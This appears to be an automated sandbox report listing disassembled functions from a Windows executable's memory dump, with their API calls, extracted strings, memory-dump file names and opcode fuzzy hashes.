Function 00211483, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 815ddbc3392b23ad5f7a85e8fc0ca4640b3ff37398ba9d8dbe0fbf2d782ad907
Instruction ID: 4c76b5bf368ded3f4fd0dd6b68dd232b0a6b91842fc472c8816978de1f23eb11
Opcode Fuzzy Hash: 815ddbc3392b23ad5f7a85e8fc0ca4640b3ff37398ba9d8dbe0fbf2d782ad907
Instruction Fuzzy Hash: DE21267162020ABFDB21AF608C819BB77DEEF64364B104514FB1997691F731EDB08BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F5A1E, Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,74E069A0), ref: 001F5A4F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 001F5A6E
lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 001F5A91
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0023935B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 001F5ABD

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$lstrcpylstrlen
String ID:
API String ID: 3705784190-0
Opcode ID: c99c2e8ff1f3b6db49be04616f24476b2bc697477d8f54a978a9fdb2a091a2eb
Instruction ID: fe1cf208bcd16b4250cd84f717a99efc9ea17312882393367bc122c9b184466c
Opcode Fuzzy Hash: c99c2e8ff1f3b6db49be04616f24476b2bc697477d8f54a978a9fdb2a091a2eb
Instruction Fuzzy Hash: 8521A475910208FFEB18AFA4DC4AA7A7BBAEF44300F24056DF941D7250E7B05D60CB20

Uniqueness

Uniqueness Score: -1.00%

Function 002171CB, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
_free.LIBCMT ref: 0021722D
_free.LIBCMT ref: 00217263
SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 18008ec20c7722df02e4dd264434f9898e04aa55ba1116ff1b1b022a663a073f
Instruction ID: 45e7f7fb0c25fd7c629f8b2e2112888f7952ae056cbe3b9c12f7988c414c9ecb
Opcode Fuzzy Hash: 18008ec20c7722df02e4dd264434f9898e04aa55ba1116ff1b1b022a663a073f
Instruction Fuzzy Hash: 1411CA7622C2023BC6126A746CC9DEB21FA9BE17747350724FA38861E1DF718CF74920

Uniqueness

Uniqueness Score: -1.00%

Function 001F5F32, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 001F5F3C
_strlen.LIBCMT ref: 001F5F51
_strlen.LIBCMT ref: 001F5F7A
_strlen.LIBCMT ref: 001F5F94

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: c8d674cd7251150c5158f136fb42f073152be2931da901e9f62802c245701b17
Instruction ID: 3d1aaeb20cec300177dbda82c3c451f8f107e20f81b6b90486b8d93790279510
Opcode Fuzzy Hash: c8d674cd7251150c5158f136fb42f073152be2931da901e9f62802c245701b17
Instruction Fuzzy Hash: 0E01B9365107086BDF11DF58CC81DAE776DDE883547548458FE0997243D731FE154AB4

Uniqueness

Uniqueness Score: -1.00%

Function 001D5505, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C
RollbackTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D5554

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Transaction$CommitCopyCreateFileRollbackTransacted
String ID:
API String ID: 2868256026-0
Opcode ID: 17ebbf83d361cb45659cf6a259aadbb8cbc3da8b54bf95fbf7746701a10dbf96
Instruction ID: 2055f851136924f399e97dab1105188fc0d52686755beb9ae306f32a14b3142d
Opcode Fuzzy Hash: 17ebbf83d361cb45659cf6a259aadbb8cbc3da8b54bf95fbf7746701a10dbf96
Instruction Fuzzy Hash: 1DF0AFB2211110BFF7288BA8BC88DB7366FEB463617540666FD16D62D1D760DC428AB1

Uniqueness

Uniqueness Score: -1.00%

Function 001FED7A, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000000,?,?,?,001D379B,?,?,?,00000000), ref: 001FED97
GetLastError.KERNEL32(?,?,?,001D379B,?,?,?,00000000,00000000,?,?,00000007), ref: 001FEDA3
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,001D379B,?,?,?,00000000), ref: 001FEDC9
GetLastError.KERNEL32(?,?,?,001D379B,?,?,?,00000000,00000000,?,?,00000007), ref: 001FEDD5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: a280e18b50f06ba654254318f5a6bc10e3b1bbeb2fcadd737c7ec97943f67374
Instruction ID: 7199f7a40f6397ceaa36c3ab368c4ef2e731c69a564bbedee42b8e53d700ba87
Opcode Fuzzy Hash: a280e18b50f06ba654254318f5a6bc10e3b1bbeb2fcadd737c7ec97943f67374
Instruction Fuzzy Hash: 8C01CD36600159BB8F221FD5EC08DAB3E6AEFD9791B114025FF0595630C731C922EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0022676B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(0020657E,001FFBCC,?,00000000,0020657E,?,0022347F,0020657E,00000001,0020657E,0020657E,?,0021796B,00000000,8304488B,0020657E), ref: 00226782
GetLastError.KERNEL32(?,0022347F,0020657E,00000001,0020657E,0020657E,?,0021796B,00000000,8304488B,0020657E,00000000,0020657E,?,00217EBF,00000010), ref: 0022678E

Part of subcall function 00226754: CloseHandle.KERNEL32(FFFFFFFE,0022679E,?,0022347F,0020657E,00000001,0020657E,0020657E,?,0021796B,00000000,8304488B,0020657E,00000000,0020657E), ref: 00226764

___initconout.LIBCMT ref: 0022679E

Part of subcall function 00226716: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00226745,0022346C,0020657E,?,0021796B,00000000,8304488B,0020657E,00000000), ref: 00226729

WriteConsoleW.KERNEL32(0020657E,001FFBCC,?,00000000,?,0022347F,0020657E,00000001,0020657E,0020657E,?,0021796B,00000000,8304488B,0020657E,00000000), ref: 002267B3

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: db0731439cba67e37a1b702085dc1e4fb2e16ff0481a1690f99389ff3680c5e2
Instruction ID: 384f0264cb810bf23fae3d46c625cc4039df0766d0f116dd9f94b06f69ef993d
Opcode Fuzzy Hash: db0731439cba67e37a1b702085dc1e4fb2e16ff0481a1690f99389ff3680c5e2
Instruction Fuzzy Hash: 0AF01C37412226BFCF222FD5FC0C9897F26EB097A4B114410FE1895130DA328830DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001FEB8D, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CreateSymbolicLinkW.KERNEL32(001CB622,?,?,?,001FEFB8,001CB622,?,00000000,?,001CB05E,?,?,?,?,?), ref: 001FEB9D
GetLastError.KERNEL32(?,001FEFB8,001CB622,?,00000000,?,001CB05E,?,?,?,?,?,?,001CB622,?), ref: 001FEBA7
CreateSymbolicLinkW.KERNEL32(001CB622,?,?,?,001FEFB8,001CB622,?,00000000,?,001CB05E,?,?,?,?,?), ref: 001FEBBB
GetLastError.KERNEL32(?,001FEFB8,001CB622,?,00000000,?,001CB05E,?,?,?,?,?,?,001CB622,?), ref: 001FEBC5

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateErrorLastLinkSymbolic
String ID:
API String ID: 191780330-0
Opcode ID: d00460a002391ddbf687d2f9cc3557e84aa60c6ea7d873bd0d6676424bc5a869
Instruction ID: 5dd317a0ec1c144cdd804818dee36ef466f631411bf428a578c8210b477f0955
Opcode Fuzzy Hash: d00460a002391ddbf687d2f9cc3557e84aa60c6ea7d873bd0d6676424bc5a869
Instruction Fuzzy Hash: 28E0E53510450CFF9F216F98EC48DA93BAAEF10701B008414FE0A96031C732CA62AA50

Uniqueness

Uniqueness Score: -1.00%

Function 001D96FE, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D9703

Part of subcall function 001CAC66: __EH_prolog.LIBCMT ref: 001CAC6B

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Strings

$hkgehett`epe, xrefs: 001D9778
#/'?8>)-!, xrefs: 001D9B38

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$DeallocateTransaction$CommitCopyCreateFileTransacted
String ID: #/'?8>)-!$$hkgehett`epe
API String ID: 1419897864-3792288279
Opcode ID: bd97dd024e4fda597ecf1c1f9180dde5de251ac379e96e25b49e6292c2935db9
Instruction ID: acd4841e7ac3fd3f6a48fe4996b5da220d21681fe535a53e9f257f90b05feace
Opcode Fuzzy Hash: bd97dd024e4fda597ecf1c1f9180dde5de251ac379e96e25b49e6292c2935db9
Instruction Fuzzy Hash: C5F14770D04299CACF19EFA4C991BEDFBB1AF25300F14419EE459BB242EB705A89CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D7361, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 365COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001D7366

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Part of subcall function 001D2D4F: _Deallocate.LIBCONCRT ref: 001D2D64

Part of subcall function 001F57CC: __EH_prolog.LIBCMT ref: 001F57D1

Part of subcall function 001D5505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,001DA94A,?,?,00000000), ref: 001D551B
Part of subcall function 001D5505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 001D5541
Part of subcall function 001D5505: CommitTransaction.KTMW32(00000000,?,001DA94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 001D554C

Strings

.#, xrefs: 001D75AF
6jt_XWXUS, xrefs: 001D73A3

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted
String ID: .#$6jt_XWXUS
API String ID: 86610801-593144450
Opcode ID: 0a52dc1cfe98d69a90d5cd1096cdfdef3ffc94a61479a45c021d201dc5d164a4
Instruction ID: 33b4883dd9ca5b81985a663274313b687de4500044007d9710139a97bf27223a
Opcode Fuzzy Hash: 0a52dc1cfe98d69a90d5cd1096cdfdef3ffc94a61479a45c021d201dc5d164a4
Instruction Fuzzy Hash: FAF15A70D04289DBCF15DBA4D491AEDFBB1AF29300F14819EE429B7392EB345A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0021293D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002129CD

Strings

pow, xrefs: 002129A5, 002129C2

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: dac075e21b4d90c7c44b39149060149e10de6936a04f1d62ec8ac5a2994eba8e
Instruction ID: 97446d4753a19768b2ad794617ec00f5bdcd9a811f06b0d42f13a11111363900
Opcode Fuzzy Hash: dac075e21b4d90c7c44b39149060149e10de6936a04f1d62ec8ac5a2994eba8e
Instruction Fuzzy Hash: 1E515C71A38103CACB157F18DE053FA2BD0EB74750F344D68F8D5412A9EA318CF99A46

Uniqueness

Uniqueness Score: -1.00%

Function 001DA31F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001DA324

Strings

dm|{, xrefs: 001DA36B
RR, xrefs: 001DA347

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: RR$dm|{
API String ID: 3519838083-3963068849
Opcode ID: 46c05fd6f5e1740a0a5de7b0e57d2958833462db8c843ba22017290ad33fe9de
Instruction ID: 1c0758c969368fc2755a70250799b79eb91587587abe984438ba105876a2cd58
Opcode Fuzzy Hash: 46c05fd6f5e1740a0a5de7b0e57d2958833462db8c843ba22017290ad33fe9de
Instruction Fuzzy Hash: D2418131D052489ECF05EFE8D592AEDFBB1AF79300F64841EE4117B286DB746A0ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 001E7239, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E723E

Strings

is_contiguous, xrefs: 001E72C2
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E72BD

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$is_contiguous
API String ID: 3519838083-1910854552
Opcode ID: c962b30842eede12a2f65959e3d46709b697c7d57fe4d16349cb1aeb8e81d213
Instruction ID: aaea889b8aace768aff451535b3071bf4cb1b87be59bcea691fa988c6deb9770
Opcode Fuzzy Hash: c962b30842eede12a2f65959e3d46709b697c7d57fe4d16349cb1aeb8e81d213
Instruction Fuzzy Hash: 0C4126B1E1464A9FDB48CFADC4406AEFBF0AF49300B24C06ED889E7341D7309941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CA440, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 001CA447

Strings

", ", xrefs: 001CA50E
: ", xrefs: 001CA4EF

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog2
String ID: ", "$: "
API String ID: 1857396960-747220369
Opcode ID: c3f165abcd077bf961c2e4e608ed84c801d02d64e2d32152fe73dde40727e227
Instruction ID: d0d8f717b55630f253569c879a195254d81660b46d36915976b39811485524f2
Opcode Fuzzy Hash: c3f165abcd077bf961c2e4e608ed84c801d02d64e2d32152fe73dde40727e227
Instruction Fuzzy Hash: E631E1B1A01204AFCB14DF94D846BAEFBB5EFA4700F10416EF411AB381DBB1AA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001E6CC9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E6CCE

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E6D87
object != nullptr, xrefs: 001E6D8C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 2b733cd5bd5ccbb4c2060bf3ded99ad92dda59e82b349f11658ac917535d523c
Instruction ID: 53e4f36e4325f68f3fcfda036248e4ce570b1b76aaa79913c2930ccf32b84a11
Opcode Fuzzy Hash: 2b733cd5bd5ccbb4c2060bf3ded99ad92dda59e82b349f11658ac917535d523c
Instruction Fuzzy Hash: BF313971A04A869BC715DFABC8516BEFBB0FF25350F948119D0D5A3751C731EA40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001FA929, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001FA92E

Strings

true, xrefs: 001FA99E
false, xrefs: 001FA98B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: false$true
API String ID: 3519838083-2658103896
Opcode ID: 2ee9d774e361b76006fac292ab77bb727bf0263d35c6214014ab3a87e002e12f
Instruction ID: c14d23cac46eed2529e7c85c83e7f47cad475bc1127e9f19dc0d4291ae8d1da1
Opcode Fuzzy Hash: 2ee9d774e361b76006fac292ab77bb727bf0263d35c6214014ab3a87e002e12f
Instruction Fuzzy Hash: 142105B2900748AFC320EFB4D451BAABBF4EF19300F00C52AE2EAC7651DB70A504CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001E6F3F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E6F44

Strings

m_object != nullptr, xrefs: 001E6F67
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E6F62

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_object != nullptr
API String ID: 3519838083-1282721270
Opcode ID: a58907d7f0927868de8ea311cafb07e9b59915be6389065ede958ccbca973b52
Instruction ID: c45bdefab763ed78e9a6c2c5163f4596cf7c1cf077b66899a4768f7c482fdef2
Opcode Fuzzy Hash: a58907d7f0927868de8ea311cafb07e9b59915be6389065ede958ccbca973b52
